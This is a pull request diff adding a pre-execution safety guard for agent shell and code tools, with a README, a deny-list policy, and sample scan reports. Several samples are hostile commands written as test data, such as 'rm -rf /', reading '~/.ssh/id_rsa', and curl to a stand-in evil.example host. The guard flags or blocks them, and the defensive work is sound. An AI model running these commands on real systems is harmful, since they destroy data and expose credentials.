### PR TITLE
tool/safety: add extensible pre-execution safety guard

### DIFF
--- a/codeexecutor/codeexecutor.go
+++ b/codeexecutor/codeexecutor.go
@@ -18,6 +18,7 @@ import (
 	"fmt"
 	"regexp"
 	"strings"
+	"time"
 )
 
 // CodeExecutor executes code blocks via a friendly front-door API.
@@ -27,6 +28,12 @@ type CodeExecutor interface {
 	ExecuteCode(context.Context, CodeExecutionInput) (CodeExecutionResult, error)
 	// CodeBlockDelimiter returns the delimiters used for code blocks.
 	CodeBlockDelimiter() CodeBlockDelimiter
+}
+
+// ExecutionTimeoutProvider reports the effective per-execution timeout of a
+// CodeExecutor. The boolean is false when execution has no finite timeout.
+type ExecutionTimeoutProvider interface {
+	CodeExecutionTimeout() (time.Duration, bool)
 }
 
 // CodeExecutionInput is the input for code execution.

--- a/codeexecutor/e2b/e2b.go
+++ b/codeexecutor/e2b/e2b.go
@@ -171,6 +171,14 @@ type CodeExecutor struct {
 	owned bool
 }
 
+var _ codeexecutor.ExecutionTimeoutProvider = (*CodeExecutor)(nil)
+
+// CodeExecutionTimeout reports the configured per-cell timeout. A negative or
+// zero duration disables a finite timeout.
+func (c *CodeExecutor) CodeExecutionTimeout() (time.Duration, bool) {
+	return c.executionTimeout, c.executionTimeout > 0
+}
+
 // New creates a new CodeExecutor. When `WithSandboxID` is supplied it connects
 // to an existing sandbox; otherwise a new sandbox is created.
 func New(opts ...Option) (*CodeExecutor, error) {

--- a/codeexecutor/env_provider.go
+++ b/codeexecutor/env_provider.go
@@ -12,6 +12,7 @@ package codeexecutor
 import (
 	"context"
 	"runtime"
+	"time"
 
 	"trpc.group/trpc-go/trpc-agent-go/internal/envscrub"
 )
@@ -129,8 +130,19 @@ type envCodeExecutor struct {
 	provider RunEnvProvider
 }
 
+var _ ExecutionTimeoutProvider = (*envCodeExecutor)(nil)
+
 func (e *envCodeExecutor) Engine() Engine {
 	return NewEnvInjectingEngine(e.ep.Engine(), e.provider)
+}
+
+// CodeExecutionTimeout preserves the wrapped executor's timeout capability.
+func (e *envCodeExecutor) CodeExecutionTimeout() (time.Duration, bool) {
+	provider, ok := e.CodeExecutor.(ExecutionTimeoutProvider)
+	if !ok {
+		return 0, false
+	}
+	return provider.CodeExecutionTimeout()
 }
 
 // mergeProviderEnv builds a fresh Env map that contains all entries

--- a/codeexecutor/env_provider_test.go
+++ b/codeexecutor/env_provider_test.go
@@ -237,7 +237,9 @@ func TestEnvEngine_NilRunner(t *testing.T) {
 // --- CodeExecutor wrapper tests ---
 
 type fakeCodeExecutor struct {
-	eng Engine
+	eng     Engine
+	timeout time.Duration
+	bounded bool
 }
 
 func (e *fakeCodeExecutor) ExecuteCode(
@@ -249,6 +251,9 @@ func (e *fakeCodeExecutor) CodeBlockDelimiter() CodeBlockDelimiter {
 	return CodeBlockDelimiter{Start: "```", End: "```"}
 }
 func (e *fakeCodeExecutor) Engine() Engine { return e.eng }
+func (e *fakeCodeExecutor) CodeExecutionTimeout() (time.Duration, bool) {
+	return e.timeout, e.bounded
+}
 
 func TestNewEnvInjectingCodeExecutor_WrapsEngine(t *testing.T) {
 	fr := &fakeRunner{}
@@ -273,7 +278,9 @@ func TestNewEnvInjectingCodeExecutor_WrapsEngine(t *testing.T) {
 
 func TestNewEnvInjectingCodeExecutor_PreservesCodeExecutor(t *testing.T) {
 	fr := &fakeRunner{}
-	inner := &fakeCodeExecutor{eng: &fakeEngine{runner: fr}}
+	inner := &fakeCodeExecutor{
+		eng: &fakeEngine{runner: fr}, timeout: 7 * time.Second, bounded: true,
+	}
 
 	wrapped := NewEnvInjectingCodeExecutor(inner, func(ctx context.Context) map[string]string {
 		return nil
@@ -283,6 +290,11 @@ func TestNewEnvInjectingCodeExecutor_PreservesCodeExecutor(t *testing.T) {
 	require.NoError(t, err)
 	assert.Equal(t, "exec", result.Output)
 	assert.Equal(t, "```", wrapped.CodeBlockDelimiter().Start)
+	timeoutProvider, ok := wrapped.(ExecutionTimeoutProvider)
+	require.True(t, ok)
+	timeout, bounded := timeoutProvider.CodeExecutionTimeout()
+	assert.True(t, bounded)
+	assert.Equal(t, 7*time.Second, timeout)
 }
 
 func TestNewEnvInjectingCodeExecutor_NilArgs(t *testing.T) {

--- a/codeexecutor/local/local.go
+++ b/codeexecutor/local/local.go
@@ -37,6 +37,13 @@ type CodeExecutor struct {
 	workspaceMode      WorkspaceMode
 }
 
+var _ codeexecutor.ExecutionTimeoutProvider = (*CodeExecutor)(nil)
+
+// CodeExecutionTimeout reports the timeout enforced for each code block.
+func (e *CodeExecutor) CodeExecutionTimeout() (time.Duration, bool) {
+	return e.Timeout, true
+}
+
 // CodeExecutorOption configures a local CodeExecutor.
 type CodeExecutorOption func(*CodeExecutor)
 

--- a/codeexecutor/sandbox/executor.go
+++ b/codeexecutor/sandbox/executor.go
@@ -30,6 +30,16 @@ type CodeExecutor struct {
 	codeBlockDelimiter codeexecutor.CodeBlockDelimiter
 }
 
+var _ codeexecutor.ExecutionTimeoutProvider = (*CodeExecutor)(nil)
+
+// CodeExecutionTimeout reports the runtime's effective default run timeout.
+func (e *CodeExecutor) CodeExecutionTimeout() (time.Duration, bool) {
+	if e == nil || e.runtime == nil {
+		return 0, false
+	}
+	return e.runtime.defaultTimeout, e.runtime.defaultTimeout > 0
+}
+
 // New creates a sandbox code executor.
 func New(options ...Option) *CodeExecutor {
 	rt := NewRuntime(options...)

--- a/examples/tool_safety_guard/README.md
+++ b/examples/tool_safety_guard/README.md
@@ -66,6 +66,8 @@ redaction.
 ## Policy
 
 `tool_safety_policy.yaml` controls allowed commands, denied commands, denied
-paths, network allowlists, maximum timeout, maximum output size, environment
-variable allowlist, and commands that require human review. Changing those
-fields does not require code changes.
+paths, network allowlists, maximum timeout, caller-declared output caps,
+environment variable allowlist, and commands that require human review. The
+output-cap policy validates requests whose executor already enforces a byte
+cap; the built-in adapters do not claim a byte limit because their schemas do
+not expose one. Changing those fields does not require code changes.

--- a/examples/tool_safety_guard/README.md
+++ b/examples/tool_safety_guard/README.md
@@ -1,0 +1,71 @@
+# Tool Safety Guard
+
+This example demonstrates the `tool/safety` pre-execution guard for
+command-like tools. It scans workspace shell commands, host shell commands, and
+code execution blocks before the underlying tool runs.
+
+Run the bundled samples:
+
+```bash
+cd examples/tool_safety_guard
+go run . -policy tool_safety_policy.yaml -audit tool_safety_audit.jsonl
+```
+
+The example prints structured scan reports, writes the same JSON array to
+`tool_safety_report.json`, and writes one monitoring-friendly JSONL event per
+scan to `tool_safety_audit.jsonl`. The checked-in artifacts are the complete
+output from these bundled samples.
+
+## How It Fits
+
+`internal/shellsafe` is the conservative shell structure parser used by the
+guard. It rejects shell constructs that can bypass argv-level checks, including
+`sh -c`, `bash -c`, `eval`, backticks, `$()`, variable expansion, redirection,
+background operators, and unsupported control flow. The safety guard builds on
+that parser and adds policy checks for dangerous commands, denied paths, network
+allowlists, host execution risk, dependency installation, resource abuse, and
+secret leakage.
+
+`tool.PermissionPolicy` is the execution-time hook. Use
+`safety.NewPermissionPolicy(...)` as a run-level permission policy so
+`workspace_exec`, `exec_command` from hostexec, and `execute_code` are scanned
+before they execute. `deny` blocks execution. `needs_human_review` and `ask`
+map to the framework approval-required action.
+
+MCP, Skill, and custom execution tools can opt into the same policy with
+`safety.WithPermissionRequestParser(toolName, parser)`. The parser maps the
+tool's argument schema to a `safety.Request`; non-execution tools remain
+unaffected by the wrapper.
+
+`workspaceexec` runs inside an executor workspace. That is a safer boundary than
+direct host execution, but it still needs command filtering, clean environment
+handling, output limits, and workspace file controls. `hostexec` runs through
+the host shell, so PTY sessions, background jobs, privilege changes, process
+cleanup, and environment isolation require stricter review. `codeexecutor` can
+execute code blocks through local, container, Jupyter, or other backends; code
+that bridges into shell execution should still be reviewed by the guard.
+
+When OpenTelemetry is enabled, callers can attach the report attributes returned
+by `Report.SpanAttributes()`:
+
+- `tool.safety.decision`
+- `tool.safety.risk_level`
+- `tool.safety.rule_id`
+- `tool.safety.backend`
+
+## Not A Sandbox
+
+This guard is a pre-execution filter and audit layer. It reduces obvious unsafe
+tool calls and produces structured evidence, but it cannot replace sandbox
+isolation. A scanner can miss novel obfuscation, language-specific behavior,
+runtime side effects, compromised dependencies, or vulnerabilities in tools
+after execution starts. Keep using sandbox file-system policy, network policy,
+process limits, clean environments, timeouts, output caps, and artifact
+redaction.
+
+## Policy
+
+`tool_safety_policy.yaml` controls allowed commands, denied commands, denied
+paths, network allowlists, maximum timeout, maximum output size, environment
+variable allowlist, and commands that require human review. Changing those
+fields does not require code changes.

--- a/examples/tool_safety_guard/README.md
+++ b/examples/tool_safety_guard/README.md
@@ -32,6 +32,11 @@ secret leakage.
 before they execute. `deny` blocks execution. `needs_human_review` and `ask`
 map to the framework approval-required action.
 
+The built-in code-execution adapter is recognized even when its model-facing
+name is changed. It reads the executor's effective timeout through
+`codeexecutor.ExecutionTimeoutProvider`; executors that cannot report a finite
+timeout fail closed when the permission request includes the actual tool.
+
 MCP, Skill, and custom execution tools can opt into the same policy with
 `safety.WithPermissionRequestParser(toolName, parser)`. The parser maps the
 tool's argument schema to a `safety.Request`. Tools without a built-in or

--- a/examples/tool_safety_guard/README.md
+++ b/examples/tool_safety_guard/README.md
@@ -34,8 +34,10 @@ map to the framework approval-required action.
 
 MCP, Skill, and custom execution tools can opt into the same policy with
 `safety.WithPermissionRequestParser(toolName, parser)`. The parser maps the
-tool's argument schema to a `safety.Request`; non-execution tools remain
-unaffected by the wrapper.
+tool's argument schema to a `safety.Request`. Tools without a built-in or
+registered parser require approval by default. Set `unknown_tool_action` to
+`allow` only when the surrounding application separately proves those tools
+safe; `deny` is also supported.
 
 `workspaceexec` runs inside an executor workspace. That is a safer boundary than
 direct host execution, but it still needs command filtering, clean environment
@@ -70,4 +72,8 @@ paths, network allowlists, maximum timeout, caller-declared output caps,
 environment variable allowlist, and commands that require human review. The
 output-cap policy validates requests whose executor already enforces a byte
 cap; the built-in adapters do not claim a byte limit because their schemas do
-not expose one. Changing those fields does not require code changes.
+not expose one. `unknown_tool_action` controls unrecognized tools and defaults
+to `ask`. For programmatic configuration, start with `safety.DefaultPolicy()`
+before setting `review_shell_pipelines` or `deny_on_parse_error` to false;
+their zero values otherwise inherit the conservative true defaults. Changing
+those fields does not require code changes.

--- a/examples/tool_safety_guard/main.go
+++ b/examples/tool_safety_guard/main.go
@@ -154,11 +154,12 @@ var samples = []safety.Request{
 		Command:  "yes x | head -c 9999999",
 	},
 	{
-		ToolName:   "exec_command",
-		Backend:    safety.BackendHostExec,
-		Command:    "tail -f app.log",
-		TTY:        true,
-		Background: true,
+		ToolName:       "exec_command",
+		Backend:        safety.BackendHostExec,
+		Command:        "tail -f app.log",
+		TimeoutSeconds: 300,
+		TTY:            true,
+		Background:     true,
 	},
 	{
 		ToolName: "execute_code",

--- a/examples/tool_safety_guard/main.go
+++ b/examples/tool_safety_guard/main.go
@@ -1,0 +1,171 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2025 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package main
+
+import (
+	"bytes"
+	"encoding/json"
+	"flag"
+	"fmt"
+	"os"
+	"time"
+
+	"trpc.group/trpc-go/trpc-agent-go/tool/safety"
+)
+
+func main() {
+	policyPath := flag.String("policy", "tool_safety_policy.yaml", "safety policy path")
+	auditPath := flag.String("audit", "tool_safety_audit.jsonl", "audit JSONL output path")
+	reportPath := flag.String("report", "tool_safety_report.json", "structured report JSON output path")
+	flag.Parse()
+
+	policy, err := safety.LoadPolicy(*policyPath)
+	if err != nil {
+		fmt.Fprintf(os.Stderr, "load policy: %v\n", err)
+		os.Exit(1)
+	}
+	if err := resetFile(*auditPath); err != nil {
+		fmt.Fprintf(os.Stderr, "reset audit: %v\n", err)
+		os.Exit(1)
+	}
+
+	reports := sampleReports(policy)
+	for _, report := range reports {
+		if err := appendAuditFileAt(*auditPath, report, time.Now()); err != nil {
+			fmt.Fprintf(os.Stderr, "write audit: %v\n", err)
+			os.Exit(1)
+		}
+	}
+	reportBytes, err := encodeReports(reports)
+	if err != nil {
+		fmt.Fprintf(os.Stderr, "encode reports: %v\n", err)
+		os.Exit(1)
+	}
+	if err := os.WriteFile(*reportPath, reportBytes, 0o600); err != nil {
+		fmt.Fprintf(os.Stderr, "write reports: %v\n", err)
+		os.Exit(1)
+	}
+	if _, err := os.Stdout.Write(reportBytes); err != nil {
+		fmt.Fprintf(os.Stderr, "print reports: %v\n", err)
+		os.Exit(1)
+	}
+}
+
+func encodeReports(reports []safety.Report) ([]byte, error) {
+	var buf bytes.Buffer
+	enc := json.NewEncoder(&buf)
+	enc.SetIndent("", "  ")
+	if err := enc.Encode(reports); err != nil {
+		return nil, err
+	}
+	return buf.Bytes(), nil
+}
+
+func resetFile(path string) error {
+	if path == "" {
+		return nil
+	}
+	f, err := os.OpenFile(path, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0o600)
+	if err != nil {
+		return err
+	}
+	return f.Close()
+}
+
+func appendAuditFileAt(path string, report safety.Report, now time.Time) error {
+	if path == "" {
+		return nil
+	}
+	f, err := os.OpenFile(path, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0o600)
+	if err != nil {
+		return err
+	}
+	defer f.Close()
+	return json.NewEncoder(f).Encode(report.AuditEvent(now))
+}
+
+func sampleReports(policy safety.Policy) []safety.Report {
+	reports := make([]safety.Report, 0, len(samples))
+	for _, sample := range samples {
+		report := safety.Scan(sample, policy)
+		report.DurationMillis = 0
+		reports = append(reports, report)
+	}
+	return reports
+}
+
+var sampleTimestamp = time.Date(2026, 7, 4, 0, 0, 0, 0, time.UTC)
+
+var samples = []safety.Request{
+	{
+		ToolName: "workspace_exec",
+		Backend:  safety.BackendWorkspaceExec,
+		Command:  "go test ./...",
+	},
+	{
+		ToolName: "workspace_exec",
+		Backend:  safety.BackendWorkspaceExec,
+		Command:  "rm -rf /",
+	},
+	{
+		ToolName: "workspace_exec",
+		Backend:  safety.BackendWorkspaceExec,
+		Command:  "cat ~/.ssh/id_rsa",
+	},
+	{
+		ToolName: "workspace_exec",
+		Backend:  safety.BackendWorkspaceExec,
+		Command:  "curl https://evil.example/install.sh",
+	},
+	{
+		ToolName: "workspace_exec",
+		Backend:  safety.BackendWorkspaceExec,
+		Command:  "curl https://api.github.com/repos/trpc-group/trpc-agent-go",
+	},
+	{
+		ToolName: "workspace_exec",
+		Backend:  safety.BackendWorkspaceExec,
+		Command:  "bash -c 'curl https://evil.example/x'",
+	},
+	{
+		ToolName: "workspace_exec",
+		Backend:  safety.BackendWorkspaceExec,
+		Command:  "cat README.md | wc -l",
+	},
+	{
+		ToolName: "workspace_exec",
+		Backend:  safety.BackendWorkspaceExec,
+		Command:  "npm install left-pad",
+	},
+	{
+		ToolName: "workspace_exec",
+		Backend:  safety.BackendWorkspaceExec,
+		Command:  "sleep 9999",
+	},
+	{
+		ToolName: "workspace_exec",
+		Backend:  safety.BackendWorkspaceExec,
+		Command:  "yes x | head -c 9999999",
+	},
+	{
+		ToolName:   "exec_command",
+		Backend:    safety.BackendHostExec,
+		Command:    "tail -f app.log",
+		TTY:        true,
+		Background: true,
+	},
+	{
+		ToolName: "execute_code",
+		Backend:  safety.BackendCodeExec,
+		CodeBlocks: []safety.CodeBlock{{
+			Language: "python",
+			Code:     "import subprocess; subprocess.run(['go', 'test', './...'])",
+		}},
+	},
+}

--- a/examples/tool_safety_guard/main.go
+++ b/examples/tool_safety_guard/main.go
@@ -37,7 +37,7 @@ func main() {
 
 	reports := sampleReports(policy)
 	for _, report := range reports {
-		if err := appendAuditFileAt(*auditPath, report, time.Now()); err != nil {
+		if err := appendAuditFileAt(*auditPath, report, sampleTimestamp); err != nil {
 			fmt.Fprintf(os.Stderr, "write audit: %v\n", err)
 			os.Exit(1)
 		}

--- a/examples/tool_safety_guard/main_test.go
+++ b/examples/tool_safety_guard/main_test.go
@@ -1,0 +1,54 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2025 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package main
+
+import (
+	"bytes"
+	"encoding/json"
+	"os"
+	"testing"
+
+	"trpc.group/trpc-go/trpc-agent-go/tool/safety"
+)
+
+func TestCheckedInArtifactsMatchSamples(t *testing.T) {
+	policy, err := safety.LoadPolicy("tool_safety_policy.yaml")
+	if err != nil {
+		t.Fatalf("LoadPolicy() error = %v", err)
+	}
+	got, err := encodeReports(sampleReports(policy))
+	if err != nil {
+		t.Fatalf("encodeReports() error = %v", err)
+	}
+	want, err := os.ReadFile("tool_safety_report.json")
+	if err != nil {
+		t.Fatalf("ReadFile(report) error = %v", err)
+	}
+	if !bytes.Equal(got, want) {
+		t.Fatalf("tool_safety_report.json does not match generated samples")
+	}
+
+	var gotAudit bytes.Buffer
+	for _, report := range sampleReports(policy) {
+		if err := json.NewEncoder(&gotAudit).Encode(report.AuditEvent(sampleTimestamp)); err != nil {
+			t.Fatalf("Encode(audit) error = %v", err)
+		}
+	}
+	wantAudit, err := os.ReadFile("tool_safety_audit.jsonl")
+	if err != nil {
+		t.Fatalf("ReadFile(audit) error = %v", err)
+	}
+	if !bytes.Equal(normalizeNewlines(gotAudit.Bytes()), normalizeNewlines(wantAudit)) {
+		t.Fatalf("tool_safety_audit.jsonl does not match generated samples")
+	}
+}
+
+func normalizeNewlines(in []byte) []byte {
+	return bytes.ReplaceAll(in, []byte("\r\n"), []byte("\n"))
+}

--- a/examples/tool_safety_guard/tool_safety_audit.jsonl
+++ b/examples/tool_safety_guard/tool_safety_audit.jsonl
@@ -1,0 +1,12 @@
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"workspace_exec","decision":"allow","risk_level":"low","duration_ms":0,"redacted":false,"blocked":false,"backend":"workspaceexec"}
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"workspace_exec","decision":"deny","risk_level":"critical","rule_id":"dangerous.rm_rf","duration_ms":0,"redacted":false,"blocked":true,"backend":"workspaceexec"}
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"workspace_exec","decision":"deny","risk_level":"critical","rule_id":"sensitive.path_access","duration_ms":0,"redacted":false,"blocked":true,"backend":"workspaceexec"}
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"workspace_exec","decision":"deny","risk_level":"high","rule_id":"network.non_whitelisted_domain","duration_ms":0,"redacted":false,"blocked":true,"backend":"workspaceexec"}
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"workspace_exec","decision":"allow","risk_level":"low","duration_ms":0,"redacted":false,"blocked":false,"backend":"workspaceexec"}
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"workspace_exec","decision":"deny","risk_level":"high","rule_id":"shell.bypass","duration_ms":0,"redacted":false,"blocked":true,"backend":"workspaceexec"}
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"workspace_exec","decision":"needs_human_review","risk_level":"medium","rule_id":"shell.pipeline_review","duration_ms":0,"redacted":false,"blocked":true,"backend":"workspaceexec"}
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"workspace_exec","decision":"needs_human_review","risk_level":"medium","rule_id":"dependency.environment_change","duration_ms":0,"redacted":false,"blocked":true,"backend":"workspaceexec"}
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"workspace_exec","decision":"needs_human_review","risk_level":"medium","rule_id":"resource.long_sleep","duration_ms":0,"redacted":false,"blocked":true,"backend":"workspaceexec"}
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"workspace_exec","decision":"deny","risk_level":"high","rule_id":"resource.large_output","duration_ms":0,"redacted":false,"blocked":true,"backend":"workspaceexec"}
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"exec_command","decision":"needs_human_review","risk_level":"high","rule_id":"hostexec.long_session","duration_ms":0,"redacted":false,"blocked":true,"backend":"hostexec"}
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"execute_code","decision":"needs_human_review","risk_level":"medium","rule_id":"codeexec.host_command_bridge","duration_ms":0,"redacted":false,"blocked":true,"backend":"codeexec"}

--- a/examples/tool_safety_guard/tool_safety_policy.yaml
+++ b/examples/tool_safety_guard/tool_safety_policy.yaml
@@ -1,0 +1,77 @@
+allowed_commands:
+  - go
+  - curl
+  - cat
+  - wc
+  - npm
+  - sleep
+  - yes
+  - head
+  - tail
+  - python
+denied_commands:
+  - dd
+  - mkfs
+  - mount
+  - umount
+  - shutdown
+  - reboot
+  - halt
+  - poweroff
+  - sudo
+  - su
+  - doas
+denied_paths:
+  - /
+  - /bin
+  - /boot
+  - /dev
+  - /etc
+  - /root
+  - /sbin
+  - /sys
+  - /usr
+  - /var
+  - ~/.ssh
+  - .ssh
+  - .env
+  - .npmrc
+  - .pypirc
+  - id_rsa
+  - id_ed25519
+  - credentials
+  - secrets
+network_allowlist:
+  - api.github.com
+  - github.com
+  - proxy.golang.org
+  - sum.golang.org
+  - registry.npmjs.org
+  - pypi.org
+  - files.pythonhosted.org
+max_timeout_seconds: 300
+max_output_bytes: 4194304
+env_allowlist:
+  - PATH
+  - HOME
+  - TMPDIR
+  - TEMP
+  - TMP
+  - LANG
+  - LC_ALL
+  - CGO_ENABLED
+  - GOCACHE
+  - GOMODCACHE
+  - GOPATH
+review_commands:
+  - go install
+  - npm install
+  - npm ci
+  - pip install
+  - pip3 install
+  - apt install
+  - apt-get install
+  - brew install
+  - cargo install
+review_shell_pipelines: true
+deny_on_parse_error: true

--- a/examples/tool_safety_guard/tool_safety_policy.yaml
+++ b/examples/tool_safety_guard/tool_safety_policy.yaml
@@ -50,6 +50,7 @@ network_allowlist:
   - pypi.org
   - files.pythonhosted.org
 max_timeout_seconds: 300
+# Validates a request cap; the executor must enforce the declared byte limit.
 max_output_bytes: 4194304
 env_allowlist:
   - PATH

--- a/examples/tool_safety_guard/tool_safety_policy.yaml
+++ b/examples/tool_safety_guard/tool_safety_policy.yaml
@@ -76,3 +76,5 @@ review_commands:
   - cargo install
 review_shell_pipelines: true
 deny_on_parse_error: true
+# Supported values: ask, deny, allow. The conservative default is ask.
+unknown_tool_action: ask

--- a/examples/tool_safety_guard/tool_safety_report.json
+++ b/examples/tool_safety_guard/tool_safety_report.json
@@ -160,6 +160,15 @@
           "command \"bash\" is not in allowed_commands"
         ],
         "recommendation": "Use an allowed command or update allowed_commands in the policy."
+      },
+      {
+        "decision": "deny",
+        "risk_level": "high",
+        "rule_id": "shell.unresolved_wrapper",
+        "evidence": [
+          "command wrapper \"bash\" cannot be inspected reliably"
+        ],
+        "recommendation": "Pass the effective command directly or use an audited workspace script."
       }
     ]
   },

--- a/examples/tool_safety_guard/tool_safety_report.json
+++ b/examples/tool_safety_guard/tool_safety_report.json
@@ -1,0 +1,339 @@
+[
+  {
+    "decision": "allow",
+    "risk_level": "low",
+    "recommendation": "Command matched no high-risk safety rules.",
+    "tool_name": "workspace_exec",
+    "command": "go test ./...",
+    "backend": "workspaceexec",
+    "blocked": false,
+    "redacted": false,
+    "duration_ms": 0,
+    "safe_summary": "workspaceexec scan allowed command \"go test ./...\"; no high-risk network, path, shell, resource, dependency, or secret patterns matched."
+  },
+  {
+    "decision": "deny",
+    "risk_level": "critical",
+    "rule_id": "dangerous.rm_rf",
+    "evidence": [
+      "rm -rf /"
+    ],
+    "recommendation": "Do not run recursive forced deletion through tool execution.",
+    "tool_name": "workspace_exec",
+    "command": "rm -rf /",
+    "backend": "workspaceexec",
+    "blocked": true,
+    "redacted": false,
+    "duration_ms": 0,
+    "findings": [
+      {
+        "decision": "deny",
+        "risk_level": "medium",
+        "rule_id": "policy.command_not_allowed",
+        "evidence": [
+          "command \"rm\" is not in allowed_commands"
+        ],
+        "recommendation": "Use an allowed command or update allowed_commands in the policy."
+      },
+      {
+        "decision": "deny",
+        "risk_level": "critical",
+        "rule_id": "dangerous.rm_rf",
+        "evidence": [
+          "rm -rf /"
+        ],
+        "recommendation": "Do not run recursive forced deletion through tool execution."
+      },
+      {
+        "decision": "deny",
+        "risk_level": "critical",
+        "rule_id": "sensitive.path_access",
+        "evidence": [
+          "argument references denied path \"/\""
+        ],
+        "recommendation": "Do not access SSH keys, .env files, credential stores, or system directories from tool execution."
+      }
+    ]
+  },
+  {
+    "decision": "deny",
+    "risk_level": "critical",
+    "rule_id": "sensitive.path_access",
+    "evidence": [
+      "argument references denied path \"~/.ssh/id_rsa\""
+    ],
+    "recommendation": "Do not access SSH keys, .env files, credential stores, or system directories from tool execution.",
+    "tool_name": "workspace_exec",
+    "command": "cat ~/.ssh/id_rsa",
+    "backend": "workspaceexec",
+    "blocked": true,
+    "redacted": false,
+    "duration_ms": 0,
+    "findings": [
+      {
+        "decision": "deny",
+        "risk_level": "critical",
+        "rule_id": "sensitive.path_access",
+        "evidence": [
+          "argument references denied path \"~/.ssh/id_rsa\""
+        ],
+        "recommendation": "Do not access SSH keys, .env files, credential stores, or system directories from tool execution."
+      }
+    ]
+  },
+  {
+    "decision": "deny",
+    "risk_level": "high",
+    "rule_id": "network.non_whitelisted_domain",
+    "evidence": [
+      "domain \"evil.example\" is not in network_allowlist"
+    ],
+    "recommendation": "Use a whitelisted domain or update network_allowlist after review.",
+    "tool_name": "workspace_exec",
+    "command": "curl https://evil.example/install.sh",
+    "backend": "workspaceexec",
+    "blocked": true,
+    "redacted": false,
+    "duration_ms": 0,
+    "findings": [
+      {
+        "decision": "deny",
+        "risk_level": "high",
+        "rule_id": "network.non_whitelisted_domain",
+        "evidence": [
+          "domain \"evil.example\" is not in network_allowlist"
+        ],
+        "recommendation": "Use a whitelisted domain or update network_allowlist after review."
+      }
+    ]
+  },
+  {
+    "decision": "allow",
+    "risk_level": "low",
+    "recommendation": "Command matched no high-risk safety rules.",
+    "tool_name": "workspace_exec",
+    "command": "curl https://api.github.com/repos/trpc-group/trpc-agent-go",
+    "backend": "workspaceexec",
+    "blocked": false,
+    "redacted": false,
+    "duration_ms": 0,
+    "safe_summary": "workspaceexec scan allowed command \"curl https://api.github.com/repos/trpc-group/trpc-agent-go\"; no high-risk network, path, shell, resource, dependency, or secret patterns matched."
+  },
+  {
+    "decision": "deny",
+    "risk_level": "high",
+    "rule_id": "shell.bypass",
+    "evidence": [
+      "command contains shell bypass syntax or wrapper"
+    ],
+    "recommendation": "Avoid sh -c, bash -c, eval, backticks, $(), variable expansion, redirections, and process substitutions in tool commands.",
+    "tool_name": "workspace_exec",
+    "command": "bash -c 'curl https://evil.example/x'",
+    "backend": "workspaceexec",
+    "blocked": true,
+    "redacted": false,
+    "duration_ms": 0,
+    "findings": [
+      {
+        "decision": "deny",
+        "risk_level": "high",
+        "rule_id": "shell.bypass",
+        "evidence": [
+          "command contains shell bypass syntax or wrapper"
+        ],
+        "recommendation": "Avoid sh -c, bash -c, eval, backticks, $(), variable expansion, redirections, and process substitutions in tool commands."
+      },
+      {
+        "decision": "deny",
+        "risk_level": "high",
+        "rule_id": "network.non_whitelisted_domain",
+        "evidence": [
+          "domain \"evil.example\" is not in network_allowlist"
+        ],
+        "recommendation": "Use a whitelisted domain or update network_allowlist after review."
+      },
+      {
+        "decision": "deny",
+        "risk_level": "medium",
+        "rule_id": "policy.command_not_allowed",
+        "evidence": [
+          "command \"bash\" is not in allowed_commands"
+        ],
+        "recommendation": "Use an allowed command or update allowed_commands in the policy."
+      }
+    ]
+  },
+  {
+    "decision": "needs_human_review",
+    "risk_level": "medium",
+    "rule_id": "shell.pipeline_review",
+    "evidence": [
+      "command contains a shell pipeline or command chain"
+    ],
+    "recommendation": "Review multi-stage shell commands manually or replace them with a small audited script.",
+    "tool_name": "workspace_exec",
+    "command": "cat README.md | wc -l",
+    "backend": "workspaceexec",
+    "blocked": true,
+    "redacted": false,
+    "duration_ms": 0,
+    "findings": [
+      {
+        "decision": "needs_human_review",
+        "risk_level": "medium",
+        "rule_id": "shell.pipeline_review",
+        "evidence": [
+          "command contains a shell pipeline or command chain"
+        ],
+        "recommendation": "Review multi-stage shell commands manually or replace them with a small audited script."
+      }
+    ]
+  },
+  {
+    "decision": "needs_human_review",
+    "risk_level": "medium",
+    "rule_id": "dependency.environment_change",
+    "evidence": [
+      "command starts with \"npm install\""
+    ],
+    "recommendation": "Dependency installation or environment mutation should be reviewed and pinned before execution.",
+    "tool_name": "workspace_exec",
+    "command": "npm install left-pad",
+    "backend": "workspaceexec",
+    "blocked": true,
+    "redacted": false,
+    "duration_ms": 0,
+    "findings": [
+      {
+        "decision": "needs_human_review",
+        "risk_level": "medium",
+        "rule_id": "dependency.environment_change",
+        "evidence": [
+          "command starts with \"npm install\""
+        ],
+        "recommendation": "Dependency installation or environment mutation should be reviewed and pinned before execution."
+      }
+    ]
+  },
+  {
+    "decision": "needs_human_review",
+    "risk_level": "medium",
+    "rule_id": "resource.long_sleep",
+    "evidence": [
+      "command contains a long sleep"
+    ],
+    "recommendation": "Use a shorter sleep or a bounded wait condition.",
+    "tool_name": "workspace_exec",
+    "command": "sleep 9999",
+    "backend": "workspaceexec",
+    "blocked": true,
+    "redacted": false,
+    "duration_ms": 0,
+    "findings": [
+      {
+        "decision": "needs_human_review",
+        "risk_level": "medium",
+        "rule_id": "resource.long_sleep",
+        "evidence": [
+          "command contains a long sleep"
+        ],
+        "recommendation": "Use a shorter sleep or a bounded wait condition."
+      }
+    ]
+  },
+  {
+    "decision": "deny",
+    "risk_level": "high",
+    "rule_id": "resource.large_output",
+    "evidence": [
+      "command appears to generate output above the policy limit"
+    ],
+    "recommendation": "Limit output size, write bounded artifacts, or raise the policy limit after review.",
+    "tool_name": "workspace_exec",
+    "command": "yes x | head -c 9999999",
+    "backend": "workspaceexec",
+    "blocked": true,
